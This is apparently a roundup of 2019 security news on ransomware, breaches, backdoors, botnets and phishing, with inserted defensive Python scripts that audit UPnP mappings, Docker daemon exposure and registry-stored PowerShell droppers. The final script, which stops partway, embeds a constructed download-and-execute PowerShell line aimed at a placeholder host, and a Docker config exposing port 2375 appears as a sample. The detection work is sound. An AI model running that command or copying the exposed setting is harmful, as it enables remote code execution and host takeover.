The city of Riviera Beach, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems.
The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council had previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s network three weeks ago, encrypting data managed by the city.
The internal IT staff has been working with security consultants to restore operations, but according to them the only way to decrypt the information was to pay the ransom.
“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press. “Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”
The attack began on May 29, when an employee at the Riviera Beach police department opened a malicious email containing a link that, once clicked, infected the PC.
The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems. The email system was disabled, employees and vendors had to be paid by check rather than direct deposit, communications went down, and 911 dispatchers were unable to accept calls even though the service continued to operate.
Initially, the city council decided not to pay the ransom, but given the difficulties in restoring operations, it opted to pay.
On Monday, city officials participating in a short meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).
“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”
In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.
In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.
“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.
EatStreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of partners.
EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of delivery and restaurant partners.
Attackers breached the company network on May 3 and stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.
Stolen data includes names, addresses, phone numbers, email addresses, and billing addresses, as well as financial data (i.e. bank accounts, routing numbers, credit card numbers, expiration dates and card verification codes).
“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.
EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” and the company’s Android app has over 100,000 installs as of June 5.
EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”
At the time of writing, no law enforcement agency was investigating the incident:
“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”
“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices.”
According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines between February and April by disclosing the existence of several massive unreported data breaches in five rounds. The list of victims includes Canva, 500px, Under Armour, ShareThis, GfyCat, Ge.tt, Evite, and others.
The hacker took credit for the data breach while discussing the Canva hack allegations with ZDNet last month.
At the time the extent of the security breach was not clear, but the hacker claimed he stole over six million user records.
“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies.”
Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware.
Kaspersky experts discovered the Plurox backdoor in February; it can spread itself over a local network and could be used by attackers to install additional malware.
The Plurox backdoor is written in C and compiled with Mingw GCC, and it communicates with the command and control (C&C) server over TCP. The malware has a modular structure and uses a variety of plugins to implement its functionality.
“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”
The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.
The Plurox backdoor uses two different ports to load plugins; the ports, along with the C&C addresses, are hardcoded into the malware’s source code.
Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.
The Plurox backdoor supports the following commands:
Download and run files using WinAPI CreateProcess
Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
Download and run plugin
Update plugin (stop process and delete file of old version, load and start new one)
Stop and delete plugin
The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.
The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd.
Experts also discovered that the Plurox backdoor supports a UPnP plugin designed to target a local network.
“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network.” states the report.
If administrators detect the attack on a host, it will appear to come directly from the router rather than from a local machine.
The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139.
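The forwarding behaviour described above leaves a trace in the router’s own UPnP mapping table, which a defender can enumerate. The following script is an added example, not code from Kaspersky’s report: it parses GetGenericPortMappingEntry responses from a WANIPConnection service and flags mappings that point TCP 135, 139 or 445 at an internal host, with a short lease as a secondary indicator. The control URL of the router is assumed to be known (it comes from the device description XML), and the sample response embedded below is constructed, not captured from a real device.

```python
"""Audit a UPnP IGD router for port mappings that expose SMB/RPC to the WAN."""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

WAN_IP_SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
SENSITIVE_TCP_PORTS = {135: "MS-RPC", 139: "NetBIOS", 445: "SMB"}
PLUROX_LEASE_SECONDS = 300  # lease the report says the plugin keeps before deleting the mapping

SOAP_TEMPLATE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
    '<u:GetGenericPortMappingEntry xmlns:u="{service}">'
    '<NewPortMappingIndex>{index}</NewPortMappingIndex>'
    '</u:GetGenericPortMappingEntry></s:Body></s:Envelope>'
)
FIELDS = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
          "NewInternalClient", "NewEnabled", "NewPortMappingDescription", "NewLeaseDuration")


def parse_mapping(soap_xml):
    """Extract one GetGenericPortMappingEntry response into a plain dict."""
    root = ET.fromstring(soap_xml)
    mapping = {}
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # drop the namespace prefix, if any
        if tag in FIELDS:
            mapping[tag] = (el.text or "").strip()
    for key in ("NewExternalPort", "NewInternalPort", "NewLeaseDuration"):
        mapping[key] = int(mapping.get(key) or 0)
    return mapping


def assess_mapping(mapping):
    """Return reasons this mapping looks like Plurox/EternalSilence-style abuse (empty if benign)."""
    reasons = []
    if mapping.get("NewProtocol", "").upper() != "TCP":
        return reasons
    for side in ("NewInternalPort", "NewExternalPort"):
        port = mapping[side]
        if port in SENSITIVE_TCP_PORTS:
            reasons.append(f"{side}={port} ({SENSITIVE_TCP_PORTS[port]}) forwarded to "
                           f"{mapping.get('NewInternalClient', '?')}")
    lease = mapping["NewLeaseDuration"]
    if reasons and 0 < lease <= PLUROX_LEASE_SECONDS:
        reasons.append(f"short lease of {lease}s matches the transient forwarding pattern")
    return reasons


def fetch_mapping(control_url, index, service=WAN_IP_SERVICE, timeout=5):
    """Query one entry of the router's mapping table; None once the index runs past the end."""
    body = SOAP_TEMPLATE.format(service=service, index=index).encode()
    req = urllib.request.Request(control_url, data=body, method="POST", headers={
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": f'"{service}#GetGenericPortMappingEntry"',
    })
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_mapping(resp.read())
    except urllib.error.HTTPError as exc:
        # IGDs answer HTTP 500 (UPnPError 713, SpecifiedArrayIndexInvalid) past the last entry
        if exc.code == 500:
            return None
        raise


def audit_router(control_url, max_entries=256):
    """Walk the mapping table and return (mapping, reasons) pairs for suspicious entries."""
    findings = []
    for index in range(max_entries):
        mapping = fetch_mapping(control_url, index)
        if mapping is None:
            break
        reasons = assess_mapping(mapping)
        if reasons:
            findings.append((mapping, reasons))
    return findings


# Constructed sample responses (not captured from a real device).
SAMPLE_SUSPICIOUS = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:GetGenericPortMappingEntryResponse xmlns:u="' + WAN_IP_SERVICE + '">'
    '<NewRemoteHost></NewRemoteHost><NewExternalPort>445</NewExternalPort>'
    '<NewProtocol>TCP</NewProtocol><NewInternalPort>445</NewInternalPort>'
    '<NewInternalClient>192.168.1.23</NewInternalClient><NewEnabled>1</NewEnabled>'
    '<NewPortMappingDescription>constructed-sample</NewPortMappingDescription>'
    '<NewLeaseDuration>300</NewLeaseDuration>'
    '</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>'
)
SAMPLE_BENIGN = SAMPLE_SUSPICIOUS.replace("445", "8080").replace("300", "0")

if __name__ == "__main__":
    for sample in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        m = parse_mapping(sample)
        print(m["NewInternalClient"], m["NewInternalPort"], assess_mapping(m) or "ok")
```

Run `audit_router("http://<router>:<port>/<controlpath>")` against your own gateway to check the live table; a mapping that appears for a few minutes and then vanishes is exactly what the report describes.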
An expert discovered a new technique that bypasses SMS-based two-factor authentication while circumventing Google’s recent SMS permission restrictions.
The popular security expert Lukas Stefanko from ESET discovered some apps (named BTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange BtcTurk in an attempt to steal login credentials.
In order to steal the 2FA OTPs, the apps read the codes as they appear in 2FA notifications from the service, instead of intercepting the SMS messages that deliver them.
Stefanko explained that the renewed interest in Bitcoin is tied to the growth in its price.
“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.
“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”
When the apps are executed for the first time they request the ‘notification access’ permission, which allows them to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.
Once the permission is granted, the apps display a fake login form asking for the user’s BtcTurk login credentials. Once the user provides the credentials, the apps display a false error message.
“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).
In the meantime, the login credentials for the service are sent to the attacker’s server.
At this point, the rogue apps leverage the notification access permission to read all incoming notifications and select the ones related to applications of interest: those whose names contain the keywords gm, yandex, mail, k9, outlook, SMS, and messaging. These notifications are sent to the attacker, who selects the ones containing the one-time passwords used in 2FA.
“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.
At this point, it is easy for the attackers to impersonate the victims when accessing the service. Any 2FA OTP can be dismissed from the victim’s phone and sent to the attacker, who with this scheme holds both the login credentials and the OTP and can use them to access the account.
Experts at ESET are warning of the rapid spread of this technique, which was recently observed in attacks against users of the Turkish Koineks exchange. ESET believes that the threat actor behind the attacks is the same.
“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks (kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”
“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”
Experts believe that crooks will start using this technique against targets in other industries, including banks and financial institutions.
Good news for the victims of the latest variants of the GandCrab ransomware: NoMoreRansom released a free decryption tool.
Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a decryptor tool released on the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.
“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by Europol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”
The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalamt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.
The ransomware appeared in the threat landscape in early 2018 when experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in the Russian hacking community on the dark web, and researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.
In October 2018, experts at the Cybaze Z-Lab analyzed one of the latest iterations of the infamous GandCrab ransomware, version 5.0.
The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week. The operators also claimed to have earned a net $150 million that they have now invested in legal activities.
Experts at BitDefender pointed out that not all victims are treated equally:
“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” reads a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”
According to Europol, previously released tools for the GandCrab ransomware have helped more than 30,000 victims recover their data for free and save roughly $50 million in unpaid ransoms.
The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat.
You can download the GandCrab decryption tool for free at the following address:
Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.
Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.
The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.
Threat actors are using the RAT to deliver keyloggers and information stealers.
“The Cofense Phishing Defense Center (PDC) and Cofense Intelligence have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofense. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing.”
WSH Remote Access Tool (RAT) is a variant of the VBS (Visual Basic Script) based Houdini Worm (H-Worm) that first appeared in the threat landscape in 2013 and was updated in 2016.
The phishing messages contain an MHT file that includes an href link which, once opened, directs victims to a .zip archive containing a version of WSH RAT.
The RAT allows attackers to steal sensitive data, including passwords from victims’ browsers and email clients, and it also implements keylogging capabilities. The experts pointed out that the RAT allows attackers to remotely control the victim’s systems, and that it is also able to kill anti-malware solutions and disable Windows UAC.
The authors of the malware are offering the WSH RAT for rent: buyers pay a subscription fee of $50 per month to use all the features they have implemented.
“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”
Once the RAT reaches the C2 server, it downloads and drops three additional files with a .tar.gz extension that are actually PE32 executables.
The three downloaded payloads are a keylogger, a mail credential viewer, and a browser credential viewer. They were developed by third parties rather than by the WSH RAT operator and are used by the campaign operators to collect credentials and other sensitive information.
“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.
Experts published a list of indicators of compromise (IOCs).
Bella Thorne is the latest victim of a sextortion attack; in a case similar to the Fappening saga, a hacker threatened to publish the actress’s private nude photos.
The hacker first obtained nude photos of Bella Thorne and then threatened to leak the pictures online, but she gave him a disarming answer.
Bella Thorne tweeted the stolen photos herself, taking away the hacker’s leverage.
The actress explained that she had been harassed for the past 24 hours by a hacker who had accessed her nude photos.
The message suggests that Bella Thorne has already reported the sextortion attempt to the authorities.
“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.
“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”
Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.
Recently a new botnet, tracked as Echobot, appeared in the threat landscape; its operators are adding new exploits to infect a broad range of systems, including IoT devices and the enterprise apps Oracle WebLogic and VMware SD-WAN.
The Echobot botnet was first detected by experts at Palo Alto Networks early this month; the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators had added 8 new exploits, but currently it includes 26 exploits.
The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.
“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.
“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”
Cashdollar published a table comparing the two versions of Echobot and the exploits they use.
The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.
The experts pointed out that it was not simple to determine the vulnerabilities being exploited by the botnet because some of them had no CVE numbers assigned.
After he contacted MITRE, the organization assigned them identification numbers.
Below is the list of the exploits included in the Echobot variant discovered by the expert; some of the flaws triggered by the bot are decade-old vulnerabilities:
The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.
“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.
“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”
Botnet operators continue to implement new methods to make their malware more aggressive and to infect as many systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.
“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.
“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”
Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.
Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).
Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and using them to deliver malicious code that drops the AESDDoS Trojan.
“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”
The AESDDoS malware has been active since at least 2014 and has been used to build large DDoS botnets; in some cases, it was also used in cryptojacking campaigns.
In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.
“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.
We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”
The malware also collects system information and sends it back to the C2; depending on the specific hardware configuration, the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacks, mining cryptocurrency, etc.).
In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.
The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.
The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).
In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.
In order to secure Docker hosts, admins should allow only trusted sources to access the Docker API; below are some recommendations provided by Trend Micro.
“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.
“To prevent container-based incidents from happening, organizations can follow these guidelines:
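The exposure the campaign scans for is visible in the daemon’s own configuration, so it can be audited before an attacker finds it. The script below is an added example, not code from Trend Micro’s report or from Docker: it inspects either a daemon.json document or a dockerd command line and flags tcp:// listeners reachable without --tlsverify, showing the weak setting beside a hardened one. The configurations embedded in it are constructed; the daemon.json keys (hosts, tlsverify, tlscacert, tlscert, tlskey) and the -H/--host and --tlsverify flags are real dockerd options, while the defaulting of an empty host to localhost is an assumption about dockerd’s behaviour.

```python
"""Flag Docker daemon listeners that expose the API without TLS client authentication."""
import json
import shlex
from urllib.parse import urlsplit

PLAINTEXT_PORT = 2375  # conventional port of the unencrypted Docker API
TLS_PORT = 2376        # conventional port of the TLS-protected API
ALL_INTERFACES = {"0.0.0.0", "::"}


def parse_listener(spec, tls_verify):
    """Return (bind_addr, port) for a tcp:// host spec, or None for unix:// and fd://."""
    parts = urlsplit(spec)
    if parts.scheme != "tcp":
        return None
    # Assumed dockerd defaults: an empty host means localhost, port is 2375 or 2376 with TLS
    addr = parts.hostname or "localhost"
    port = parts.port or (TLS_PORT if tls_verify else PLAINTEXT_PORT)
    return addr, port


def audit_listeners(hosts, tls_verify):
    """Return human-readable findings; an empty list means no exposed TCP API."""
    findings = []
    for spec in hosts:
        listener = parse_listener(spec, tls_verify)
        if listener is None:
            continue  # unix sockets are governed by file permissions, not by this check
        addr, port = listener
        if not tls_verify:
            findings.append(
                f"CRITICAL {spec}: Docker API on {addr}:{port} accepts unauthenticated clients; "
                f"anyone who can reach it can run `docker exec` as root on the host")
        elif addr in ALL_INTERFACES:
            findings.append(
                f"WARN {spec}: TLS-verified API bound to all interfaces on port {port}; "
                f"restrict it with a firewall to trusted client addresses")
    return findings


def audit_daemon_json(text):
    """Audit a daemon.json document."""
    cfg = json.loads(text)
    return audit_listeners(cfg.get("hosts", []), bool(cfg.get("tlsverify", False)))


def audit_cmdline(cmdline):
    """Audit a dockerd command line such as the ExecStart of a systemd unit."""
    tokens = shlex.split(cmdline)
    hosts, tls_verify = [], False
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-H", "--host") and i + 1 < len(tokens):
            hosts.append(tokens[i + 1])
            i += 1
        elif tok.startswith(("--host=", "-H=")):
            hosts.append(tok.split("=", 1)[1])
        elif tok in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
        i += 1
    return audit_listeners(hosts, tls_verify)


# Constructed configurations: the weak setting the attackers look for beside a corrected one.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
WEAK_CMDLINE = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"

if __name__ == "__main__":
    for label, findings in (("weak daemon.json", audit_daemon_json(WEAK_DAEMON_JSON)),
                            ("hardened daemon.json", audit_daemon_json(HARDENED_DAEMON_JSON)),
                            ("weak command line", audit_cmdline(WEAK_CMDLINE))):
        print(f"{label}: {findings or 'no exposed TCP API'}")
```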
The gaming industry, in general, is aware that login attempts and other forms of credential abuse are a problem, but perhaps not as aware as it should be.
According to a new Akamai report, hackers are using new methods to evade detection, and many organizations do not grasp the scope and complexity of the identity theft problem.
The State of the Internet / Security report on web attacks and gaming abuse, published at the annual Akamai Edge World event, revealed that hackers had carried out more than 12 billion attacks against gaming sites between late 2017 and March of this year, making the gaming community one of the most heavily targeted groups for these attacks and one of the most lucrative for cybercriminals.
Overall, gaming sites saw more credential-abuse attacks than any other sector during the period investigated by Akamai.
“One reason that we believe the gaming industry is an attractive target for hackers is that criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher for Akamai and editorial director of the report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”
The Akamai report also pointed out that SQL injection attacks (SQLi) accounted for about two-thirds of all Web application attacks, while Local File Inclusion (LFI) attacks accounted for about a quarter.
The report points out that most credential stuffing lists circulate online usage data from well-known large-scale data breaches, and that many of them are rooted in SQLi.
An Akamai press release says its researchers have discovered a video explaining to users how to perform SQLi attacks against websites and use the credentials obtained to generate lists for credential stuffing against online games.
“As gaming companies continue to innovate and improve their defenses, they must also continue to educate their consumers on how to protect themselves and defend themselves. Many players are young and if they learn best practices to protect their accounts, they will incorporate them for the rest of their lives,” McKeay said.
The Akamai report shows that more than two-thirds of application layer attacks are directed against US-based organizations, and that Russia and Canada occupy positions No. 1 and No. 2 as sources of attacks against the gaming sector. “Attackers see the credential abuse as a low-risk venture with a potential for a high payout, at least for now,” Akamai’s report reads.
The report notes that hackers tend to give more value to compromised accounts linked to valid credit cards and other financial details. Once these accounts are compromised, attackers use them to buy additional items, including in-game currencies.
These types of attacks are likely to increase in the future. As with many other types of attacks, the important thing is to keep in mind that they occur, so that you can find ways to defend your business against them.
After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.
Two years after the last report, the FIN8 group is back and has carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.
The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.
FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.
The ShellTea backdoor was analyzed by researchers at root9B in June 2017; the malware was used by threat actors to deliver PoS malware.
Now experts at Morphisec revealed that they have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.
“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”
Experts believe the attackers launched phishing attacks in an attempt to deliver PoS malware.
Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even though the two groups are considered distinct.
“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”
The attack chain starts with a fileless dropper: PowerShell code stored in registry keys is executed and leads to ShellTea.
ShellTea attempts to evade detection by checking for virtualized environments and standard analysis tools. The malicious code uses a hashing algorithm to resolve most of the functions it calls, similar to the one implemented in the previous ShellTea version.
ShellTea is then injected into Explorer. It communicates with the C2 over HTTPS and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command through a downloaded native Empire ReflectivePicker, and, of course, downloading and executing a POS malware.
The attackers use a PowerShell script to collect information on the user and the network, send the gzipped data to the C2, and then delete it.
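The registry-resident PowerShell dropper described above can be hunted for in a registry export. The following is an added example written for this article, not code from Morphisec or from the ShellTea analysis: it builds a constructed .reg export (the second-stage script, the value names and the host 203.0.113.7 are all placeholders), parses it, decodes any -EncodedCommand payload found in autorun entries, and flags values elsewhere in the hive whose content reads like a script body.

```python
import base64
import re

# --- constructed sample -------------------------------------------------------
# A hand-made Windows .reg export, not taken from the Morphisec report. It holds
# one benign autorun, one autorun that launches a Base64-encoded PowerShell stub,
# and the second-stage PowerShell that the stub pulls out of an unrelated-looking
# registry value. 203.0.113.7 is a documentation address used as a placeholder.
STAGE2 = "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://203.0.113.7/s')"
STAGE1 = r"IEX (Get-ItemProperty HKCU:\Software\Temp p1).p1"


def ps_encode(cmd: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def reg_quote(value: str) -> str:
    """Quote a string value the way a .reg export does (backslash and quote are escaped)."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


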